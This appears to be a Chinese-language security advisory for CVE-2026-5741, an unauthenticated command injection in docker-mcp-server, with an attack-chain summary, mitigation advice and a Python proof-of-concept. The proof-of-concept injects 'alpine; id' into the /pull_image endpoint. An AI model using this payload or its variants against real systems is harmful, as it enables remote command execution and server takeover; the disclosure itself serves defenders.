CVE-2026-5741 CVSS 7.3 高危

CVE-2026-5741: docker-mcp-server OS命令注入漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5741

漏洞类型

操作系统命令注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

suvarchal docker-mcp-server

漏洞概述

suvarchal docker-mcp-server在0.1.0及之前版本存在严重的操作系统命令注入漏洞。该漏洞源于HTTP接口中src/index.ts文件的特定函数未对输入进行过滤。攻击者无需认证即可远程发送特制请求，注入并执行任意系统命令。目前利用代码已公开，厂商尚未修复，建议立即采取临时防护措施。

技术细节

该漏洞位于suvarchal docker-mcp-server的HTTP接口组件中，具体影响src/index.ts文件内的stop_container、remove_container及pull_image函数。这些函数在处理来自HTTP请求的参数时，直接将其拼接到系统命令字符串中执行，未经过任何安全过滤或转义。根据CVSS向量分析，攻击者无需用户交互和身份认证（PR:N/UI:N），即可通过网络（AV:N）发起攻击。攻击者可通过构造包含Shell元字符（如`;`、`|`、`&`）的恶意Payload，欺骗服务器执行任意操作系统指令。这不仅可能导致敏感信息泄露（C:L），还可能破坏数据完整性（I:L）和服务可用性（A:L），具有较高的安全风险。

攻击链分析

STEP 1

侦察

攻击者扫描网络寻找暴露的suvarchal docker-mcp-server服务（默认端口或特定端口）。

STEP 2

漏洞探测

攻击者向目标发送特制的探测请求，测试stop_container或pull_image等接口是否存在命令注入。

STEP 3

载荷构造

攻击者构造包含Shell元字符的恶意Payload，旨在执行任意系统命令（如反弹Shell或写入Webshell）。

STEP 4

漏洞利用

攻击者通过HTTP POST请求将Payload发送至受影响的端点，服务器未经过滤直接执行命令。

STEP 5

建立控制

命令执行成功后，攻击者获取服务器权限，可进一步窃取数据、横向移动或破坏系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-5741 Proof of Concept
# Target: suvarchal docker-mcp-server <= 0.1.0
# Endpoint: /pull_image (or other affected functions)

def exploit(target_ip, target_port):
    url = f"http://{target_ip}:{target_port}/pull_image"
    # Payload to execute 'id' command after pulling an image
    malicious_payload = "alpine; id"
    
    headers = {
        "Content-Type": "application/json"
    }
    
    # Attempting to inject command
    data = {
        "image": malicious_payload
    }
    
    try:
        response = requests.post(url, json=data, headers=headers, timeout=5)
        print(f"[+] Request sent to {url}")
        print(f"[+] Status Code: {response.status_code}")
        print("[+] Response:")
        print(response.text)
        
        if "uid=" in response.text:
            print("[!] Command Injection Successful!")
        else:
            print("[-] Exploit failed or output not visible.")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "127.0.0.1"
    exploit(target, 3000)

影响范围

suvarchal docker-mcp-server <= 0.1.0

防御指南

临时缓解措施

建议暂时关闭受影响服务的对外HTTP接口，或通过网络ACL限制仅允许受信任的IP地址访问。同时，检查系统日志中是否存在异常的命令执行记录。在官方修复补丁发布前，严禁将受影响版本部署于生产环境。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5741
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5741
3 Details https://www.cvedetails.com/cve/CVE-2026-5741/
4 VulDB https://vuldb.com/cve/CVE-2026-5741
5 Link https://github.com/BruceJqs/public_exp/issues/1
6 Link https://github.com/suvarchal/docker-mcp/issues/3
7 Link https://vuldb.com/submit/786948
8 Link https://vuldb.com/vuln/355748
9 Link https://vuldb.com/vuln/355748/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表